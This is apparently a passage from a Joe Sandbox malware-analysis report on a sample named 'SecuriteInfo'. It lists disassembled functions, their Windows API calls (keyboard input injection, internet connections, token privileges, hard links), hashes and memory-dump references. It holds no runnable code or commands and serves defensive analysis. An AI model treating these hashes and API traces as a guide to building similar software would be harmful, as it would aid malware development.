Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 6a7e8d1d5ba5d114339cf7750878bb5b842cbce127b43b61e7167ea5ca66e738
Instruction ID: b4f7f2f172fc4b090d5af8e2ce85a0fdae0ff26acc0b5d64e5cc6173d774294f
Opcode Fuzzy Hash: 6a7e8d1d5ba5d114339cf7750878bb5b842cbce127b43b61e7167ea5ca66e738
Instruction Fuzzy Hash: A1418431A40104ABCB14EBA4DDD5FAEB7ADEF88354F14C166F81A9B392DB34AD04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009CBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CBB09
GetLastError.KERNEL32(?,00000000), ref: 009CBB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CBB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CBB80

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c9b584351fbe649aa2a0fba07a3d1186c6178646c75a39b93f342fbc020cf667
Instruction ID: e504d17c9e829b9beb6acfb70fc0cdd11a9ef0840ed79ebb89d6f3aad07aa50e
Opcode Fuzzy Hash: c9b584351fbe649aa2a0fba07a3d1186c6178646c75a39b93f342fbc020cf667
Instruction Fuzzy Hash: AE412639600650DFCF10EF59C595A5DBBE5EF89310B098499E88A9B362CB34FD01DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009E8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009E8B4D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d71b85e2e6aeca6d7d60da4c906e793a6a1aca349cfb44d550da1c3247334f8f
Instruction ID: 19547d2d3c46111b0afd6a93568ca4b3091b1b923b68d7b6a32cbd0a23b075b3
Opcode Fuzzy Hash: d71b85e2e6aeca6d7d60da4c906e793a6a1aca349cfb44d550da1c3247334f8f
Instruction Fuzzy Hash: 6A31E874604288BFEF229FDACC95FAB3769FB05310F184A12F659D62E0CE359D409741

Uniqueness

Uniqueness Score: -1.00%

Function 009EADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 009EAE1A
GetWindowRect.USER32(?,?), ref: 009EAE90
PtInRect.USER32(?,?,009EC304), ref: 009EAEA0
MessageBeep.USER32(00000000), ref: 009EAF11

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 3dc07be7088c714a18f4d7df6c08d6faa02843498a51f909994b629ec0aa590a
Instruction ID: 8e1a585b83236dd8357656be476edd5c8dc74e24e5da67dfb8b23086cbd7144b
Opcode Fuzzy Hash: 3dc07be7088c714a18f4d7df6c08d6faa02843498a51f909994b629ec0aa590a
Instruction Fuzzy Hash: F5418E70600199DFCB22CF6AC884B697BF5FF89350F1481A9E4149B261D730BC02DF92

Uniqueness

Uniqueness Score: -1.00%

Function 009C0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009C1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 009C1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009C10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009C110B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 183bf174207f1c52568dca55406b212306b9a9f1c4074950a098902fd957248c
Instruction ID: 9996386d961b9c6a1a8869a97c92fb33eba11cdc20fa8d82247a94c2731488d1
Opcode Fuzzy Hash: 183bf174207f1c52568dca55406b212306b9a9f1c4074950a098902fd957248c
Instruction Fuzzy Hash: 8A312630E44688AEFB34CA658C05FFABBADAB87310F08421EE580561D3C37889C1975B

Uniqueness

Uniqueness Score: -1.00%

Function 009C1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 009C1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 009C1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 009C11F1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 009C1243

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: aeb800ca9de55205063a65b97b229585651f4b17fd6eb01558ccebb83270da40
Instruction ID: 5754a6ffcc5d36bfe5417b4d9d373bf5478d6da61e1b01c3ca8135cf337a774c
Opcode Fuzzy Hash: aeb800ca9de55205063a65b97b229585651f4b17fd6eb01558ccebb83270da40
Instruction Fuzzy Hash: BB313930D482489AEF348A658818FFABB6DAB86310F08435FF590921D2C3384D55975B

Uniqueness

Uniqueness Score: -1.00%

Function 00996415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0099644B
__isleadbyte_l.LIBCMT ref: 00996479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009964A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009964DD

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 93b17fde8632476438a491a4c2720027555d7c20dbaa5508d73e5e7e8f2d0e44
Instruction ID: 2813418de87529daa851643d0edebd79248f389e50c243babb1af25cad4502e3
Opcode Fuzzy Hash: 93b17fde8632476438a491a4c2720027555d7c20dbaa5508d73e5e7e8f2d0e44
Instruction Fuzzy Hash: D931AF31604246AFDF219FB9C845BAA7BA9FF41310F158429F8548B1A1EB35D850DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009E5189

Part of subcall function 009C387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009C3897
Part of subcall function 009C387D: GetCurrentThreadId.KERNEL32 ref: 009C389E
Part of subcall function 009C387D: AttachThreadInput.USER32(00000000,?,009C52A7), ref: 009C38A5

GetCaretPos.USER32(?), ref: 009E519A
ClientToScreen.USER32(00000000,?), ref: 009E51D5
GetForegroundWindow.USER32 ref: 009E51DB

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c246833cff391b710e7169c6373ec63309e81dc88c951bdf2170b3d70f04810c
Instruction ID: c970cd9fa5a08ed3281c3dc7b9c982c7a6caaf1bd87cb795e50ac75005fcaac8
Opcode Fuzzy Hash: c246833cff391b710e7169c6373ec63309e81dc88c951bdf2170b3d70f04810c
Instruction Fuzzy Hash: 29312C71900108AFDB00EFA5C985AEFB7FDEF98300F11806AE415E7251EA759E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009EC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

GetCursorPos.USER32(?), ref: 009EC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0099BBFB,?,?,?,?,?), ref: 009EC7D7
GetCursorPos.USER32(?), ref: 009EC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0099BBFB,?,?,?), ref: 009EC85E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: e274999fcba633b7b74c57f9491aa3eb01deaa8edc5416d5d9f3829b73ebaf4e
Instruction ID: f5d8bf504b3f424cf82df69370301b391fb993c3558ce008cee0bd6e5dc418a0
Opcode Fuzzy Hash: e274999fcba633b7b74c57f9491aa3eb01deaa8edc5416d5d9f3829b73ebaf4e
Instruction Fuzzy Hash: 20315C75600098BFCB26CF99C898EBE7BBAFB49310F044069F9458B261C7319D52DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009B8669
Part of subcall function 009B8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009B8673
Part of subcall function 009B8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009B8682
Part of subcall function 009B8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009B8689
Part of subcall function 009B8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009B869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009B8BEB
_memcmp.LIBCMT ref: 009B8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B8C44
HeapFree.KERNEL32(00000000), ref: 009B8C4B

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 133ba957565f45a0c2fe76127c3334ae6d3588047220d7797c69ebc08f4328aa
Instruction ID: 67bd422d124d9c5a26d472783e0f6e967416d6b1f1cb77343aa5d865fb590e1d
Opcode Fuzzy Hash: 133ba957565f45a0c2fe76127c3334ae6d3588047220d7797c69ebc08f4328aa
Instruction Fuzzy Hash: EC2181B1D01209EFDB10DFA4CA45BEEBBBCEF48365F144059E494AB241DB31AE06DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00980BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00980BF2

Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009C7B20,?,?,00000000), ref: 00965B8C
Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009C7B20,?,?,00000000,?,?), ref: 00965BB0

_fprintf.LIBCMT ref: 00980C29
OutputDebugStringW.KERNEL32(?), ref: 009B6331

Part of subcall function 00984CDA: _flsall.LIBCMT ref: 00984CF3

__setmode.LIBCMT ref: 00980C5E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: db159c0fd640491d080fbacb17f9535bc515b25ef54b784b02206ab605b62741
Instruction ID: 215c3eca241000295023ee4cb2ec58d89023e8f8fc0f77efe223eec04b734033
Opcode Fuzzy Hash: db159c0fd640491d080fbacb17f9535bc515b25ef54b784b02206ab605b62741
Instruction Fuzzy Hash: C311E4329042096ACB15B7B49C43BBE7B6D9FC1320F14011AF24497392DE355D469795

Uniqueness

Uniqueness Score: -1.00%

Function 009D1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D1A97

Part of subcall function 009D1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D1B40
Part of subcall function 009D1B21: InternetCloseHandle.WININET(00000000), ref: 009D1BDD

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ef61da351fa5d1c3bb6ecc58eaeedcc9c38a3e8bb645f0b72ce7f17e915978a2
Instruction ID: cb138d2ae00cc93738768efa4995e537bf394a1ab16f24085c169ce317efc3c1
Opcode Fuzzy Hash: ef61da351fa5d1c3bb6ecc58eaeedcc9c38a3e8bb645f0b72ce7f17e915978a2
Instruction Fuzzy Hash: 7321A136284A01BFDB159F60CC01FBAB7ADFF94701F10841BFA5196761EB75E811ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 009BE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009BF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009BE1C4,?,?,?,009BEFB7,00000000,000000EF,00000119,?,?), ref: 009BF5BC
Part of subcall function 009BF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 009BF5E2
Part of subcall function 009BF5AD: lstrcmpiW.KERNEL32(00000000,?,009BE1C4,?,?,?,009BEFB7,00000000,000000EF,00000119,?,?), ref: 009BF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,009BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009BE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 009BE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,009BEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009BE237

Strings

cdecl, xrefs: 009BE22E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 7095c1057db6b12d3bfb7d7ab35355c40ad024cffd30fa75298b26640cf5a0c7
Instruction ID: fbca0919dcdad9d0913ffbdc4712d52ead9452c470bdc737be4f078a11b6220c
Opcode Fuzzy Hash: 7095c1057db6b12d3bfb7d7ab35355c40ad024cffd30fa75298b26640cf5a0c7
Instruction Fuzzy Hash: 5511BE3A204345EFCB25AF64DD45ABA77ACFF84360B40802AF816CB260EB719851D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00995332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00995351

Part of subcall function 0098594C: __FF_MSGBANNER.LIBCMT ref: 00985963
Part of subcall function 0098594C: __NMSG_WRITE.LIBCMT ref: 0098596A
Part of subcall function 0098594C: RtlAllocateHeap.NTDLL(01620000,00000000,00000001,00000000,?,?,?,00981013,?), ref: 0098598F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4bb73b30161f5a595083d3794d6cf86d2a3c967512bb7b373bee0c160eeeed99
Instruction ID: ffab75b6c29453d6068b503596f63100c7ff7864f5721d9942add88773ccae74
Opcode Fuzzy Hash: 4bb73b30161f5a595083d3794d6cf86d2a3c967512bb7b373bee0c160eeeed99
Instruction Fuzzy Hash: F211E372504A15EFCF323F78EC4676F3B989F543E0B11482AF9099A290DE768D4197A0

Uniqueness

Uniqueness Score: -1.00%

Function 00964531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00964560

Part of subcall function 0096410D: _memset.LIBCMT ref: 0096418D
Part of subcall function 0096410D: _wcscpy.LIBCMT ref: 009641E1
Part of subcall function 0096410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009641F1

KillTimer.USER32(?,00000001,?,?), ref: 009645B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009645C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0099D6CE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 14cd31811638b8b9b07e736de4cd0246556edef53cf40022cfc2698820b3c4b4
Instruction ID: 503f260617f0dfc1c868f9a2d2702a32171c31a80e06799dc50268aa3305b989
Opcode Fuzzy Hash: 14cd31811638b8b9b07e736de4cd0246556edef53cf40022cfc2698820b3c4b4
Instruction Fuzzy Hash: 73212670909784AFEB328B78CC95BE7BBEC9F01308F04009EE29E56281C7751E85DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009C7B20,?,?,00000000), ref: 00965B8C
Part of subcall function 00965B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009C7B20,?,?,00000000,?,?), ref: 00965BB0

gethostbyname.WSOCK32(?,?,?), ref: 009D66AC
WSAGetLastError.WSOCK32(00000000), ref: 009D66B7
_memmove.LIBCMT ref: 009D66E4
inet_ntoa.WSOCK32(?), ref: 009D66EF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: c5aca425cbab91ecfc494148683ec70b3ee906db621efe6ec937ad68bd74e698
Instruction ID: 6661d0701bcd3971d40378bb2b3c4d1dfaebe440f0cd85dcc1f791af86579166
Opcode Fuzzy Hash: c5aca425cbab91ecfc494148683ec70b3ee906db621efe6ec937ad68bd74e698
Instruction Fuzzy Hash: C6113035500509AFCB04FFA4DD96EEEB7B8AF94310B148066F506A7262DF30AE04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009B9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 009B9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009B9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009B906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009B9086

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

